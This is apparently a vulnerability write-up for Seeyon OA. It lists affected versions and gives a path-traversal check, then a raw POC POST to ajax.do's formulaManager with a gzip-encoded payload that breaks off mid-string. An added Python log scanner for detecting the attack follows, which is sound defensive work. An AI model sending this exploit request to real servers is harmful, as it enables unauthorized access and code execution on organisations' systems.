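Affected versions:
Seeyon OA V8.0
Seeyon OA V7.1, V7.1SP1
Seeyon OA V7.0, V7.0SP1, V7.0SP2, V7.0SP3
Seeyon OA V6.0, V6.1SP1, V6.1SP2
Seeyon OA V5.x
Seeyon OA G6
Setting up a test environment:
Vulnerability verification:
Accessing /seeyon/autoinstall.do/..;/ajax.do produces the exception shown in the figure below, which indicates that the vulnerability is present.
Capture the request and modify the packet
POC: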
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 5166
Host: 192.168.0.102:8082
Connection: close

managerMethod=validate&arguments=%1F%C2%8B%08%00%C2%9C%C2%A8%C3%BB%60%00%C3%BF%C2%8DV%5B%C2%93%C2%9AH%14%7E%C3%9F%5Fa%C3%8D%C3%8BLj%C2%B2%C2%A6%05%C3%89%C2%84M%C3%AD%C3%83%C3%80H%C2%83%28%C2%A3%C2%A2%C3%9C%C2%B6%C3%B6%01%1A%04%C2%B4%C2%B9D%40%C3%85T%C3%BE%7BN%C2%A3%C2%93q6%C3%99%C2%AD%C2%B5%C3%8A%C2%82%C3%AE%3E%C3%97%C3%AF%7C%C3%A74%7F%7D%C2%BD%5D%17%C2%BB%C2%AC%C2%A1%C3%BE%C2%B2%2D%C2%A3%C3%9B%3Fz%C2%83%C3%B7%C2%BD%C2%97%1D%C3%83%C
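For detection, the distinguishing feature of the requests above is that the raw path names autoinstall.do while a `..;/` segment makes the path resolve to /seeyon/ajax.do. The following is an added example, not part of the original write-up: it scans access-log lines and flags requests whose resolved path ends at ajax.do but differs from the raw path. The log format, the sample lines and the function names are constructed for illustration, and `container_path` is a simplified model of how a servlet container drops `;` path parameters and resolves `..`.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (assumed combined-log style, not from the page).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2021:10:00:00 +0800] "GET /seeyon/main.do?method=index HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2021:10:00:05 +0800] "GET /seeyon/autoinstall.do/..;/ajax.do HTTP/1.1" 200 310',
    '10.0.0.9 - - [01/Jan/2021:10:00:09 +0800] "POST /seeyon/autoinstall.do.css/..;/ajax.do'
    '?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1" 500 87',
    '10.0.0.7 - - [01/Jan/2021:10:01:00 +0800] "POST /seeyon/ajax.do?method=ajaxAction HTTP/1.1" 200 64',
    '10.0.0.9 - - [01/Jan/2021:10:02:00 +0800] "GET /seeyon/autoinstall.do/%2e%2e;/ajax.do HTTP/1.1" 200 310',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def container_path(raw_path):
    """Simplified model: percent-decode, drop ';params' per segment, resolve dots."""
    out = []
    for seg in unquote(raw_path).split("/"):
        seg = seg.split(";", 1)[0]      # "..;" becomes ".."
        if seg == "..":
            if out:
                out.pop()               # step back over the previous segment
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)


def inspect(line):
    """Return a finding when the raw path and the resolved ajax.do path disagree."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    resolved = container_path(parts.path)
    if resolved.endswith("/ajax.do") and resolved != parts.path:
        return {"method": m.group("method"), "raw": parts.path,
                "resolved": resolved, "query": parts.query}
    return None


def scan(lines):
    return [hit for hit in map(inspect, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["method"]} {hit["raw"]} -> {hit["resolved"]}')
```

Direct requests to /seeyon/ajax.do are not flagged, because the raw and resolved paths match; the model decodes before stripping parameters, so it errs toward flagging encoded variants.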